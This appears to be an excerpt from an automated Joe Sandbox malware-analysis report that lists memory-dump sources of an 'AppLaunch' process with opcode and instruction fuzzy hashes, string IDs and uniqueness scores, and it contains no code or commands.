                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 801a2686f6fa9d2ba0f7048c2452b4a2c675f39455d5788a3a6427ed2d56a9e8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 537a0c8ca44af9076d3f0a6bf70560aa7114f31f868ce90039dda0f4e9d85698
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 801a2686f6fa9d2ba0f7048c2452b4a2c675f39455d5788a3a6427ed2d56a9e8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADA33E30E90B5A96EB209B54CC91BD9F371BF96700F61C746B6583B5C0EBB0BAD58B40
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 957f5d51ec21ad9f3b8c92e6087319e8534fb9c65a2f6bd334e0148a31041f36
                                                                                                                                                                                                                                                                                                                  • Instruction ID: c3e7c129ae361237e1f98090504bbc6af040fdc3086bb876c0d3641512c51ade
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 957f5d51ec21ad9f3b8c92e6087319e8534fb9c65a2f6bd334e0148a31041f36
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACA32E30E90B5A96EB209B54CC91BD9F371BF96700F61C746B6583B5C0EBB0BAD58B40
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: ,)$X(
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2353765651
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a8f3df6207d70648cc67259db0b8688ca38c3b825dfb753f906d0d91d5ba9ff4
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 46497a571914ff00cb06ed82aef6de16fd559a00b710db7faf4979989d743765
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f3df6207d70648cc67259db0b8688ca38c3b825dfb753f906d0d91d5ba9ff4
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42124E34B402058FCB14DF69C494AAEBBF6FF89750B158169E906EB7A5DB30EC41CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: \V/m
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3920697484
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 392781b9b4b5dc1291d3cfbd9d41452f81c4008a6760bc31803c01ac074daef8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4843eb8d46bc0c2e7cbfbc3ce533eec3ca287017e5c2a98cb97b715db7401095
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 392781b9b4b5dc1291d3cfbd9d41452f81c4008a6760bc31803c01ac074daef8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40B16B71E40209CFDF10CFA9C8857AEBBF2BF89304F148529E815A7694EB789951CB81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd7473ce6b8433e919d3482376ddd5fd5fe6b294208ef25d82d8c3e451aea8d6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 22d1cc86a928ffee0a53eceea7a055822834ae7c7768daf71ab9ebd5f8217e22
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd7473ce6b8433e919d3482376ddd5fd5fe6b294208ef25d82d8c3e451aea8d6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6B17C70E44209CFDB10CFA9C8817ADBBF2BF88754F188529E815EB694EB74D855CB81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: XY0$XY0$d60$|j$|j$|j
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4192908907
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7208b94c460c179b5cb69570a6234a3c38b4fd100e7590a87489e62796845f92
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c8ab00b40280c29c3ccd37a13411dbe22e8993bceb5324193d7981f6d1c09a8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7208b94c460c179b5cb69570a6234a3c38b4fd100e7590a87489e62796845f92
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C051F6327083459FCB149EBDD85096AB7A6EFC6214B24C17BEA068B261EB31DC45C7A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: H$L_0$n
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2014687879
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 934923d6b3474cf1541d6073fc50c8db5fb02ea318baf0bbd35b46407f99b9ab
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 67f10d984c99176245d9571c3b200c236d126d639473385d3c5901bd5f17067e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 934923d6b3474cf1541d6073fc50c8db5fb02ea318baf0bbd35b46407f99b9ab
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A51CE313002108FDB14DB78D490A6A7BA6EFCA310B1485AAE505DB3A1DB75ED06CBA2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 50b8e77971c3cb1cdca16c6730fb2e1c17e6161cd070d79c2170a907ab1753e7
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f5f7afe1301a407864b997dae31ffe400eaad71e8c2f1f7a461dc10fde77c168
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50b8e77971c3cb1cdca16c6730fb2e1c17e6161cd070d79c2170a907ab1753e7
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB53E7749052188FDBA4DF60C990BAEBBB6FF88301F1041E9C64AA7394DB356E85DF41
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8506da3e445de651f3eab8c46235a1af72f5c989fba52fac2f430bcc088a3376
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 838fd60ba438ee2c414e420c227bd9015bac99f12e1ba2547f890e696d9aeac2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8506da3e445de651f3eab8c46235a1af72f5c989fba52fac2f430bcc088a3376
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2053E6749052188FDBA4DF60C990BAEBBB6FF88301F1041E9C64AA7394DB356E85DF41
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5b5a3e90018c5254b7505c49fd854c6129a8a44b1439c395de5c726ec802c1ab
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ec3b77461d0b4af0d1ca0a74467e16896e58a4261769ef3bc3d8037313b3b3f8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b5a3e90018c5254b7505c49fd854c6129a8a44b1439c395de5c726ec802c1ab
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA234E39902204DFCF56AF60C559A5DB772FB8A34AB2080AAED1257760CB7F9D41EF01
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0abe813d5ef6e2e0185d9651ff91607713752bb09bdad2189735c5505f1d985e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 278873d75b9b971d4bd758cc8c139c8da9408abf14ffc6ce6e86193a719dbf1e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0abe813d5ef6e2e0185d9651ff91607713752bb09bdad2189735c5505f1d985e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55235E39902204DFCF56AF60C159A5DB772FB8A34AB20806AED1257750CB7F9D41EF01
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9641fe7fbabaeee1ecc91680c1b3487e74e2c1268e0e147bd3c9d0c5db8f25d8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d42ec2bf21bb96e34a547f83c128f0037a7b6b01bcab449dacffc938d4cc4ee
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9641fe7fbabaeee1ecc91680c1b3487e74e2c1268e0e147bd3c9d0c5db8f25d8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28026B34610605CFD720CF29C48096ABBF2EF89324B15C669D59ADBBA1DB30FC56CB94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4cba0c615d586fa37b550ef9f67c38c7458ef6748e914a6c0a8e138c636a6ce1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9eed6061efaeb9750c20609d2f2ee5eedd4c099fadec83122b374f9315274755
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cba0c615d586fa37b550ef9f67c38c7458ef6748e914a6c0a8e138c636a6ce1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C17B34600606CFC714CF28C58096ABBF2FF89310B16CAA9E55A9B765D730FD56CB94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: \V/m
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3920697484
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ad516167830726dc4c583722d13b80a14ff9a51f687a71a7c90e3a9e6c198a3d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 917c24b98c7ce459c958fb09dd740ac880e7d1b546710d4c63f8df7f792ac2f6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad516167830726dc4c583722d13b80a14ff9a51f687a71a7c90e3a9e6c198a3d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65B16A70E40209CFDF10CFA9C8857DEBBF2BF89714F148129E814A7694EB789965CB81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97bf841514a639051f9b23d04f1ed4274ff241bec09ea5100f0e84f96ae208d9
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 06ff665e590f1aec1a9ca264c312fa2fe65e809f0461fd2c237608e8fbc0f80c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97bf841514a639051f9b23d04f1ed4274ff241bec09ea5100f0e84f96ae208d9
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43613630A00606CFCB24DF59D5C08AAF7B6FF88310B10C569D91997A25EB30F962CFA5
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 059141691d35d00735f02f4045774f30d80e9c77f51ee6350eea198076c5e09d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 670e3630b025ecdc8ca97c9b669e630c2a7ae1794a6d41da0d418bb63e9301ac
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 059141691d35d00735f02f4045774f30d80e9c77f51ee6350eea198076c5e09d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12E2FD34A80219DBEB14DB60EC65BBD7B32FF85300F5080A8EA0967791DB356D82DF91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ebbfa7a448eb165cc544e4409c7077cd6a0fca398915a45e2f3322a978ee73a7
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ec6caddedd518f312c34a8175a97571570b8add346f8fad5e02bc33f75928a6b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebbfa7a448eb165cc544e4409c7077cd6a0fca398915a45e2f3322a978ee73a7
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE2DC34A80619DBEB14DB60EC65BBD7B32FF89300F5080A8EA0967791DB356D81DF91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: l#
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-540851012
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2f38a07a145b2b293b11e3a5b1f25e75d8f200fd4771d3fc194726d04430623d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 85f8fd123c889bfa3caa741f8c6979c4c034eb276fc68bb359b7b1216f8413bb
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f38a07a145b2b293b11e3a5b1f25e75d8f200fd4771d3fc194726d04430623d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9701D6302002018FC209E779E4659AE37E6EFCA210715446DC50A8B351EF24AD0787A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 236d0374d97f90e29016c88798dbca16de1be88c6786bea4f9fbcc25780d4a5d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ad3702bc83724d9231277bc6b74ecbe0a2d9490c97f11916217cd88d1db24f5c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 236d0374d97f90e29016c88798dbca16de1be88c6786bea4f9fbcc25780d4a5d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CA22D30B402189FDB25DF64C950BAEB7F6EF89704F108199E649AB3A1DB319D818F91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f342e914ead135b8d874a13c4bd36f2d3804913ececaadee73b5833ae6863ad6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 81603e7f98fb3405e6f7ceab7a0f55bd040cd5c6f01f0d3ebd37e7696294b432
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f342e914ead135b8d874a13c4bd36f2d3804913ececaadee73b5833ae6863ad6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F54256707007158FEB64DFA8D45066EBBB2FBC6305B418A1CD607AB390DB76ED058B86
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5f79577ad7d729f21da944fdf03a50fba949e53d9f7ea5816a42b9f7a606d99d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: c1fa72dc44f52ffc8f64a7d446b3cd2bed6593f757ada964a93931d652ba9c3d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f79577ad7d729f21da944fdf03a50fba949e53d9f7ea5816a42b9f7a606d99d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8112C034B042558FDB14EFA9C854A6E7BF2EF8A314F548069E80ADB391DB34DC46CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 17bb74bd106df7d0b2ca04bf6744113f99ccf7a711d627e100203d715b772ab2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ed00b0f4a6a28c7720285fd46a43c73a75e0ea984219d934311ef2f2f5fa10b3
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17bb74bd106df7d0b2ca04bf6744113f99ccf7a711d627e100203d715b772ab2
